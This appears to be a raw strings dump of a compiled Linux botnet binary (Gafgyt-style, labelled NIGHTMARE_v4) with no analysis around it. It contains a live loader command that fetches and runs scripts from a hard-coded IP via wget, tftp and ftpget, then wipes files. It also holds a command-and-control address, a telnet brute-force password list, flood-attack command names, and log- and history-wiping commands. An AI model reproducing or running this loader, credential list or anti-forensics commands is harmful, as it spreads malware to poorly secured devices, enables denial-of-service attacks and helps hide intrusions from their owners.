PTRh,
<suM
<duJ
<xuJ
<XuJ
<uuG
<cuU
<ru3
;E }
[^_]
[^_]
L$$S
D$ S
L$$S
D$ S
UWVS
[^_]
UWVS
\$0e
[^_]
[^_]
T$ S
t$(j
D$ P
D$$;D$ u
c9Y@t&
QPRS
9S@t
K8um
t$$S
[^_]
UWVS
T$`~
@;D$,|
D$(%
UVPR
$VRP
;0u&
D$ P
QRPP
RRPS
u%Ph
u1P)
[^_]
%u!@
tR~P
tB~@=
UWVS
|$h~
:*u4
u3Q)
D$PPj
D$TP
D$l)
l[^_]
UWVS
ZY[^_]
UWVS
D$gP
[^_]
|$HPh
D$ P
D$ Ph
RRVj
PPVj
D$ Pj
RRVj
PPVj
RRVj	
PPVj	
D$ e
RRVj
PPVj
D$ Pj
D$<P
XZShH9
D$,PS
UWVS
\$Th
D$8P
uO;-
uG;t$
48#t$$
t$ #D$$
;L$(r"
D$8P
[^_]
[^_]
u99K
;U,tK
[^_]
UWVS
u:9z
;5|9
QQPS)
[^_]
D$0 
D$(Pj
\$ S
D$,Ph
UWVS
G;<$|
XZKy
[^_]
UWVS
[^_]
Z[^_
UWVS
 <xu
(<`v
}3A9
t$$h\
8cu"
D$ =
[^_]
D$0u3e
D$,PPj
D$8PP
D$0Pj
SuMe
PPSh
UWVS
t@;D$|u
t+PPj/
u#Qj
HuHPh\3
Php3
D$DP
D$ Pj
D$Ht
D$<P
D$HPj
\$LPj
;T$H
DD$L
D$<P
u)Pj
D$HPj
P[^_
D$(j
t$LW
RRPj
xOQQ
D$ %
3PPj
UWVS
D$D@PS
T$<:
T$41
|$<HG
T$4;l$
PPWS
T$<:
[^_]
t$Dj
D$<PR
t$(j
UWVS
;L$(
[^_]
9S@t
UWVS
[^_]
UWVS
<rtB<w
t;<af
[^_]
UWVS
wsQUWR
[^_]
[^_]
UWVS
[^_]
UWVS
 <au
u'z%
u?z=
|$-`
D$`p
)L$ 
T$(f
l$F1
D$8RP
D$(	
D$(G
|$-`w
D$- 
|$-gu
|$-ft
0000
|$-gu
D$7f
D$lp
\$t|:
T$p)
|$-gt
|$-gu
|$7ftt
D$.x	
D$/+
D$/-
)|$$9
T$X~;
D$7g
[^_]
9S@t
K8uN
C<;C
9S@t
K8uG
C<QS
Z %0
UWVS
t'9s@t
[^_]
UWVS
[^_]
QQWS
'RRWS
UWVS
.u5A
Z[^_]
UWVS
u*PP
t$|RVU
t$|j
t$hR
t$hj
D$ PWj
t$(S
L[^_]
UWVS
\$4u
;5|9
t$8R
t$8S
[^_]
UWVS
D$(Q
|$01
[^_]
+q(e
t$|Q
FTX[^_
VHZ[^_
[^_]
9S@t
x:PW
[^_]
UWVS
L$,9
T$,+t$
L$,)
L$,9
,[^_]
+0u-f
\$7S
<[^_]
UWVS
;D$|v
"QQR
[^_]
UWVS
;T$(
u/;L$(
F;t$0
;|$(sQPS
[^_]
UWVS
9L$4s
L$81
D$<;
D$<f
T$ f
QQWU
L$<9
H9D$4}	
+\$@
D$dP
t$XU
D$$+D$@)
D$Dy
L$`Q
9T$D|
T$H;
[^_]
UWVS
u=PP
5QQ@k
t5PPh
tfPPj:U
WWh"
VVh*
uxRRh
\$$S
uXPPj.S
[^_]
t$4j
t$8j
t$hPU
t$hj
D$<Pj
@;D$4v
RRSV
T$T1
[^_]
\$_S
UWVS
\$(e
[^_]
t$|Q
PVWS
UWVS
u9QQ
u,QP
u,RP
D$ PW
[^_]
UWVS1
ZRRj.W
D$()
[^_]
cd /tmp || cd /var/system || cd /mnt || cd /root || cd /; busybox wget http://46.165.253.13/gtop.sh; chmod 777 gtop.sh; sh gtop.sh; tftp 46.165.253.13 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 46.165.253.13; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 46.165.253.13 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf gtop.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
46.165.253.13:2783
Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5
Mozilla/5.0 (compatible; Konqueror/3.0; i686 Linux; 20021117)
Mozilla/5.0 (iPhone; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10
Mozilla/5.0 Galeon/1.0.3 (X11; Linux i686; U;) Gecko/0
Opera/6.04 (Windows XP; U) [en]
Opera/9.99 (X11; U; sk)
Mozilla/6.0 (Future Star Technologies Corp. Star-Blade OS; U; en-US) iNet Browser 2.5
Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc
Mozilla/5.0 Galeon/1.2.9 (X11; Linux i686; U;) Gecko/20021213 Debian/1.2.9-0.bunk
Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41
Mozilla/5.0 (compatible; iCab 3.0.3; Macintosh; U; PPC Mac OS)
Opera/9.80 (J2ME/MIDP; Opera Mini/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/886; U; en) Presto/2.4.15Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1
Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)
Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4
Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201
Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911
Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)
Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7
Mozilla/5.0 (PLAYSTATION 3; 3.55)
Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2
wii libnup/1.0
Mozilla/4.0 (PSP (PlayStation Portable); 2.00)
PSP (PlayStation Portable); 2.00
Bunjalloo/0.7.6(Nintendo DS;U;en)
Doris/1.15 [en] (Symbian)
BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1
BlackBerry9700/5.0.0.743 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100
Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16
Opera/9.80 (Windows NT 5.1; U;) Presto/2.7.62 Version/11.01
Mozilla/5.0 (X11; Linux x86_64; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.62
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.39 Safari/525.19
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; uZardWeb/1.0; Server_JP)
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17 Skyfire/2.0
SonyEricssonW800i/R1BD001/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20110517 Firefox/5.0 Fennec/5.0
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)
MOT-V300/0B.09.19R MIB/2.2 Profile/MIDP-2.0 Configuration/CLDC-1.0
Mozilla/5.0 (Android; Linux armv7l; rv:9.0) Gecko/20111216 Firefox/9.0 Fennec/9.0
Mozilla/5.0 (compatible; Teleca Q7; Brew 3.1.5; U; en) 480X800 LGE VX11000
MOT-L7/08.B7.ACR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1
root
admin
user
login
guest
support
toor
changeme
Do nine men interpret Nine men I nod
1234
12345
123456
default
vizxv
password
(null)
buf: %s
/bin/sh
/proc/cpuinfo
BOGOMIPS
Borrow or rob
PING
:>%$#
%d.%d.%d.%d
ogin
assword:
user
pass
name
word
invalid
incorrect
fail
again
wrong
accessdenied
error
Eleele
REPORT %s:%s:%s
%s %s HTTP/1.1
Host: %s
User-Agent: %s
Connection: close
PONG!
GETLOCALIP
My IP: %s
SCANNER
SCANNER ON | OFF
STOPPING TELNET SCANNER
STARTING TELNET SCANNER
HOLDFLOOD
JUNKFLOOD
UDPFLOOD
HTTPFLOOD
CNCFLOOD
COMBOFLOOD
STDFLOOD
TCPFLOOD
KILLATTK
GTFOFAG
FATCOCK
rm -rf /var/log/wtmp
rm -rf /tmp/*
history -c
rm -rf ~/.bash_history
rm -rf /bin/netstat
history -w
killall -9 perl
service iptables stop
8.8.8.8
/proc/net/route
	00000000	
NIGHTMARE_v4
/usr/sbin/dropbear
BUILD %s
BUILD %s
PONG
%s 2>&1
(nil)
(null)
hlLjztqZ
npxXoudifFeEgGaACScs
 +0-#'I
Unknown error 
Success
Operation not permitted
No such file or directory
No such process
Interrupted system call
Input/output error
No such device or address
Argument list too long
Exec format error
Bad file descriptor
No child processes
Resource temporarily unavailable
Cannot allocate memory
Permission denied
Bad address
Block device required
Device or resource busy
File exists
Invalid cross-device link
No such device
Not a directory
Is a directory
Invalid argument
Too many open files in system
Too many open files
Inappropriate ioctl for device
Text file busy
File too large
No space left on device
Illegal seek
Read-only file system
Too many links
Broken pipe
Numerical argument out of domain
Numerical result out of range
Resource deadlock avoided
File name too long
No locks available
Function not implemented
Directory not empty
Too many levels of symbolic links
No message of desired type
Identifier removed
Channel number out of range
Level 2 not synchronized
Level 3 halted
Level 3 reset
Link number out of range
Protocol driver not attached
No CSI structure available
Level 2 halted
Invalid exchange
Invalid request descriptor
Exchange full
No anode
Invalid request code
Invalid slot
Bad font file format
Device not a stream
No data available
Timer expired
Out of streams resources
Machine is not on the network
Package not installed
Object is remote
Link has been severed
Advertise error
Srmount error
Communication error on send
Protocol error
Multihop attempted
RFS specific error
Bad message
Value too large for defined data type
Name not unique on network
File descriptor in bad state
Remote address changed
Can not access a needed shared library
Accessing a corrupted shared library
.lib section in a.out corrupted
Attempting to link in too many shared libraries
Cannot exec a shared library directly
Invalid or incomplete multibyte or wide character
Interrupted system call should be restarted
Streams pipe error
Too many users
Socket operation on non-socket
Destination address required
Message too long
Protocol wrong type for socket
Protocol not available
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Address family not supported by protocol
Address already in use
Cannot assign requested address
Network is down
Network is unreachable
Network dropped connection on reset
Software caused connection abort
Connection reset by peer
No buffer space available
Transport endpoint is already connected
Transport endpoint is not connected
Cannot send after transport endpoint shutdown
Too many references: cannot splice
Connection timed out
Connection refused
Host is down
No route to host
Operation already in progress
Operation now in progress
Stale NFS file handle
Structure needs cleaning
Not a XENIX named type file
No XENIX semaphores available
Is a named type file
Remote I/O error
Disk quota exceeded
No medium found
Wrong medium type
?/proc/stat
/proc/cpuinfo
processor
/sys/devices/system/cpu
/dev/null
/bin/sh
exit 0
L(knN
 Aset_thread_area failed when setting up thread-local storage
0123456789abcdef
/etc/resolv.conf
nameserver
domain
search
options
timeout
attempts
/etc/hosts
CAk[S
libpthread/nptl/sysdeps/unix/sysv/linux/close.S
__libc_close
int:t(0,1)=r(0,1);-2147483648;2147483647;
__libc_close:F(0,1)
__libc_open
__libc_open:F(0,1)
__libc_write
__libc_write:F(0,1)
__libc_read
__libc_read:F(0,1)
__waitpid
__waitpid:F(0,1)
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
.symtab
.strtab
.shstrtab
.init
.text
.fini
.rodata
.eh_frame
.tbss
.ctors
.dtors
.jcr
.got.plt
.data
.bss
.stab
.stabstr
.comment
crtstuff.c
__CTOR_LIST__
__DTOR_LIST__
__EH_FRAME_BEGIN__
__JCR_LIST__
__do_global_dtors_aux
completed.4963
p.4961
frame_dummy
object.4975
__CTOR_END__
__DTOR_END__
__FRAME_END__
__JCR_END__
__do_global_ctors_aux
initfini.c
client.c
i.4854
printchar
prints
printi
print
fdopen_pids
hextable
ipState
__syscall_fcntl.c
_exit.c
chdir.c
dup2.c
getdtablesize.c
getrlimit.c
ioctl.c
kill.c
pipe.c
prctl.c
select.c
__syscall_select
setsid.c
sigprocmask.c
time.c
isspace.c
toupper.c
__C_ctype_b.c
__C_ctype_b_data
__C_ctype_toupper.c
__C_ctype_toupper_data
errno.c
__errno_location.c
printf.c
sprintf.c
vsnprintf.c
_stdio.c
_stdio_streams
_fixed_buffers
_wcommit.c
vfprintf.c
_L_lock_18
_L_unlock_62
_vfprintf_internal.c
_charpad
_fp_out_narrow
spec_base.6615
prefix.6616
_ppfs_init.c
_ppfs_prepargs.c
_ppfs_setargs.c
_ppfs_parsespec.c
_promoted_size
type_codes
type_sizes
spec_flags.6620
qual_chars.6625
spec_chars.6621
spec_ranges.6622
spec_or_mask.6623
spec_and_mask.6624
_bss_custom_printf_spec
fputs_unlocked.c
fwrite_unlocked.c
memcpy.c
memset.c
strchr.c
strcmp.c
strcpy.c
strlen.c
strncpy.c
strnlen.c
strstr.c
__glibc_strerror_r.c
__xpg_strerror_r.c
unknown.1636
_string_syserrmsgs.c
bcopy.c
bzero.c
strtok.c
next_start.1613
isatty.c
tcgetattr.c
ntohl.c
inet_ntoa.c
buf.4724
inet_makeaddr.c
gethostbyname.c
gethostbyname2.c
buf.6861
hoste.6860
connect.c
getsockname.c
getsockopt.c
recv.c
send.c
sendto.c
setsockopt.c
socket.c
sigaddset.c
sigempty.c
signal.c
sigsetops.c
malloc.c
__malloc_largebin_index
free.c
__malloc_trim
abort.c
mylock
been_there_done_that
rand.c
random.c
unsafe_state
randtbl
random_r.c
random_poly_info
atol.c
strtol.c
_stdlib_strto_l.c
exit.c
execl.c
sysconf.c
nprocessors_onln
fork.c
_L_lock_70
_L_unlock_167
register-atfork.c
_L_lock_28
fork_handler_pool
_L_unlock_93
getpid.c
raise.c
sleep.c
pseudo_cancel
SAVEBX1
RESTBX1
pseudo_end
PUSHBX1
POPBX1
libc-cancellation.c
__uClibc_main.c
__pthread_return_0
__check_one_fd
system.c
cancel_handler
lock
_L_lock_30
sa_refcntr
quit
intr
_L_unlock_52
do_system
_L_lock_74
_L_unlock_113
_L_lock_129
_L_unlock_158
_L_lock_288
_L_unlock_328
__syscall_error.c
sigaction.c
__restore_rt
__restore
__socketcall.c
__syscall_rt_sigaction.c
execve.c
getegid.c
geteuid.c
getgid.c
getpagesize.c
getuid.c
munmap.c
nanosleep.c
__syscall_nanosleep
sbrk.c
closedir.c
opendir.c
fd_to_DIR
C.11.5298
readdir64.c
parse_config.c
wcrtomb.c
wcsrtombs.c
wcsnrtombs.c
fclose.c
_L_lock_53
_L_unlock_65
_L_unlock_82
_L_lock_103
fopen.c
_WRITE.c
_fopen.c
_L_lock_205
_L_lock_216
_L_unlock_232
_L_unlock_242
_fwrite.c
_trans2w.c
_load_inttype.c
_store_inttype.c
_uintmaxtostr.c
_fpmaxtostr.c
exp10_table
fgetc.c
_L_lock_35
fgets.c
_L_unlock_43
fflush_unlocked.c
_L_lock_13
_L_unlock_88
_L_unlock_104
_L_lock_144
_L_unlock_156
_L_lock_164
_L_unlock_174
_L_lock_195
_L_unlock_239
fgetc_unlocked.c
fgets_unlocked.c
memmove.c
strchrnul.c
strrchr.c
memrchr.c
strcspn.c
strspn.c
strtok_r.c
strpbrk.c
inet_aton.c
gethostbyname2_r.c
calloc.c
realloc.c
libc-tls.c
init_static_tls
static_slotinfo
static_dtv
static_map
dl-support.c
brk.c
fstat.c
mremap.c
xstatconv.c
getdents64.c
fseeko.c
fseeko64.c
_L_lock_34
_L_unlock_108
_READ.c
_adjust_pos.c
_rfill.c
_trans2r.c
_cs_funcs.c
rawmemchr.c
mempcpy.c
ntop.c
inet_pton4
xdigits.5147
inet_ntop4
decoded.c
dnslookup.c
last_id.6918
last_ns_num.6917
opennameservers.c
skip_nospace
skip_and_NUL_space
resolv_conf_mtime.6903
closenameservers.c
get_hosts_byname_r.c
gethostbyname_r.c
gethostname.c
poll.c
__syscall_poll
stat.c
uname.c
llseek.c
strdup.c
encodeh.c
decodeh.c
encodeq.c
read_etc_hosts_r.c
strcasecmp.c
encoded.c
__C_ctype_tolower.c
__C_ctype_tolower_data
__fini_array_end
__fini_array_start
__init_array_end
__preinit_array_end
_GLOBAL_OFFSET_TABLE_
__init_array_start
__preinit_array_start
__read_etc_hosts_r
__GI_execve
__libc_sigaction
strcpy
recvLine
__GI_sigaddset
__socketcall
__GI___ctype_b
__GI___glibc_strerror_r
waitpid
__res_sync
__open_nameservers
__GI_fopen
getrlimit
ioctl
_stdio_openlist_use_count
__GI_initstate_r
__GI_sigaction
strtok_r
__GI_time
getgid
__getpid
sysconf
printf
stdout
random
__GI_strdup
__GI_getpagesize
getdtablesize
fdopendir
__GI___ctype_toupper
__GI_strcasecmp
recv
connect
__encode_question
__GI___uClibc_fini
numpids
__encode_header
sigemptyset
__pthread_mutex_lock
initConnection
__sigdelset
__xstat32_conv
__uClibc_fini
memrchr
geteuid
inet_pton
__GI_vsnprintf
__GI_setsid
memmove
sendTCP
__GI_strpbrk
__GI_fgetc
__GI_htonl
__stdio_trans2r_o
munmap
__GI_setsockopt
__libc_stack_end
__GI_fclose
__GI_wcsnrtombs
__GI_pipe
_uintmaxtostr
__libc_fcntl
atol
getRandomPublicIP
__write
getc_unlocked
__ctype_b
__GI_random_r
usernames
errno
getegid
__GI_sbrk
zprintf
__GI___uClibc_init
__libc_h_errno
execve
getpagesize
getpid
__GI_lseek64
setstate_r
fgets
getHost
wildString
__waitpid_nocancel
__xpg_strerror_r
__read
getc
prctl
_dl_tls_static_used
God A red nugget A fat egg under a dog
memcpy
makeRandomStr
getRandomIP
__GI_fputs_unlocked
execl
__GI_fgets
__GI___open_nocancel
sendHTTP
_stdio_openlist_dec_use
sclose
__libc_select
_ppfs_init
__GI___C_ctype_toupper
__GI_fgetc_unlocked
__libc_nanosleep
trim
__GI_fgets_unlocked
dup2
__pthread_mutex_init
getuid
__GI_htons
system
__open_etc_hosts
malloc
__open
isatty
sleep
vsnprintf
__dns_lookup
__GI_read
uastrings
__C_ctype_tolower
__GI___write_nocancel
random_r
__dso_handle
__nptl_deallocate_tsd
gethostbyname_r
tcpcsum
fdpclose
socket
__GI_dup2
select
_dl_nothread_init_static_tls
__GI_ntohl
_pthread_cleanup_pop_restore
__GI_wcrtomb
__GI___libc_fcntl
__GI_memset
__GI_closedir
isspace
__stdio_seek
mempcpy
__GI_strcoll
__GI_write
__ctype_toupper
__resolv_timeout
__libc_read
__GI_opendir
__libc_disable_asynccancel
_string_syserrmsgs
__GI_open
__GI_strchr
__searchdomain
sigaddset
_dl_tls_static_align
__GI_tcgetattr
__environ
mmap
__GI_ntohs
_Exit
wcsnrtombs
bzero
makeIPPacket
_dl_tls_max_dtv_idx
sockprintf
__GI_inet_ntoa
send
__fgetc_unlocked
A Santa lives evil at NASA
abort
__GI_fcntl
__GI_wcsrtombs
__GI_fwrite_unlocked
__GI___register_atfork
__GI_getgid
srandom_r
__open_nocancel
_init
__GI_inet_ntoa_r
__GI_setstate_r
parseHex
strtol
__GI___read
pipe
strnlen
rawmemchr
uname
__GI_mempcpy
__malloc_state
__sigaddset
strrchr
nanosleep
__GI_send
calloc
h_errno
__pthread_mutex_unlock
__register_frame_info_bases
__GI_exit
__app_fini
csum
__exit_cleanup
rindex
__GI_execl
__GI_srandom_r
__GI___sigismember
__GI___ctype_tolower
write
__fork_generation_pointer
environ
__GI_close
getBuild
fstat
__resolv_lock
kill
fputs_unlocked
__pthread_mutex_trylock
__GI___sigaddset
__GI_brk
Beeb
Tacocat
_dl_tls_static_size
__GI_nanosleep
__GI_stat
__GI_strtok
_stdio_openlist
__GI_sigprocmask
inet_addr
ntohl
__GI_gethostname
__GI_fseek
_custom_printf_arginfo
__GI___libc_write
ourIP
chdir
fseeko
_stdio_openlist_del_count
connectTimeout
setsockopt
bsd_signal
fseek
mremap
__GI_kill
__GI_strcmp
__GI___open
__GI_memmove
sendSTD
setstate
__read_nocancel
__decode_dotted
__local_nameserver
__stdio_READ
__GI_toupper
__pthread_initialize_minimal
__GI_recv
__stdin
stdin
__GI_isatty
_dl_tls_dtv_slotinfo_list
_custom_printf_spec
gethostbyname2_r
__progname
_start
__deregister_frame_info_bases
__GI___read_nocancel
strstr
__GI_ioctl
init_rand
rand
__close_nameservers
__libc_errno
signal
read
__xstat64_conv
__decode_header
getCores
__GI_memcpy
strcoll
wcsrtombs
_stdio_user_locking
__linkin_atfork
strncpy
__GI___libc_close
program_invocation_short_name
strcasecmp
htonl
sendto
__C_ctype_toupper
StartTheLelz
__GI___C_ctype_b
realloc
__register_atfork
__GI_gethostbyname_r
__GI_strncpy
_dl_tls_dtv_gaps
__libc_send
__GI___xpg_strerror_r
currentServer
alula
readdir64
__GI___C_ctype_tolower
__GI_getrlimit
bcopy
__GI_strcpy
__GI_inet_ntop
strtok
__stdio_adjust_position
malloc_trim
__GI_poll
_vfprintf_internal
fork
__GI___fcntl_nocancel
__stdio_rfill
gotIP
__GI_sleep
sigaction
__GI_gethostbyname
_dl_phdr
__GI_getc_unlocked
__uClibc_init
__GI_munmap
_store_inttype
__getpagesize
__GI_random
__GI_mremap
__syscall_error
__uclibc_progname
__GI_getegid
__malloc_lock
__uClibc_main
sbrk
__rtld_fini
__GI_fork
strdup
__libc_close
__GI_getpid
inet_aton
_pthread_cleanup_push_defer
index
processCmd
__sigismember
fopen
__bss_start
__libc_open
__pthread_unwind
__GI_strchrnul
getOurIP
memset
__GI_socket
main
__glibc_strerror_r
listFork
__stdio_fwrite
_dl_tls_setup
negotiate
srand
_dl_tls_generation
__GI_uname
__resolv_attempts
__nptl_nthreads
initstate
fclose
__syscall_rt_sigaction
ntohs
sendUDP
inet_ntoa
tcgetattr
time
opendir
__libc_system
__GI_abort
poll
__GI___write
fdpopen
__GI___sigdelset
__get_hosts_byname_r
__GI___close_nocancel
__GI__exit
strcmp
__GI_strrchr
__nameserver
data_start
__GI_sysconf
__fork_handlers
__h_errno_location
matchPrompt
__GI_inet_pton
__libc_enable_asynccancel
gethostbyname
_stdio_fopen
_fini
__GI_chdir
__write_nocancel
__vfork
__GI_mmap
fgetc
gethostname
sprintf
fdgets
__get_pc_thunk_bx
strerror_r
__GI_select
__libc_waitpid
strcspn
socket_connect
__GI_waitpid
_stdio_term
__GI_vfprintf
__GI_signal
stderr
__GI_readdir64
commServer
vfork
__C_ctype_b
__libc_setup_tls
srandom
_ppfs_setargs
__GI___libc_waitpid
__GI_sendto
__GI_sigemptyset
__GI_printf
__waitpid
__libc_fork
__close_nocancel
_dl_init_static_tls
__atexit_lock
scanPid
__fork_lock
__fcntl_nocancel
rand_cmwc
getsockopt
__GI_fseeko64
_dl_tls_static_nelem
fflush_unlocked
__stdio_wcommit
__GI___fgetc_unlocked
__nameservers
fwrite_unlocked
stat
inet_ntoa_r
__pagesize
_stdio_openlist_add_lock
__GI_getdtablesize
__GI___waitpid
__close
Degas are we not drawn onward no In union drawn onward to new eras aged
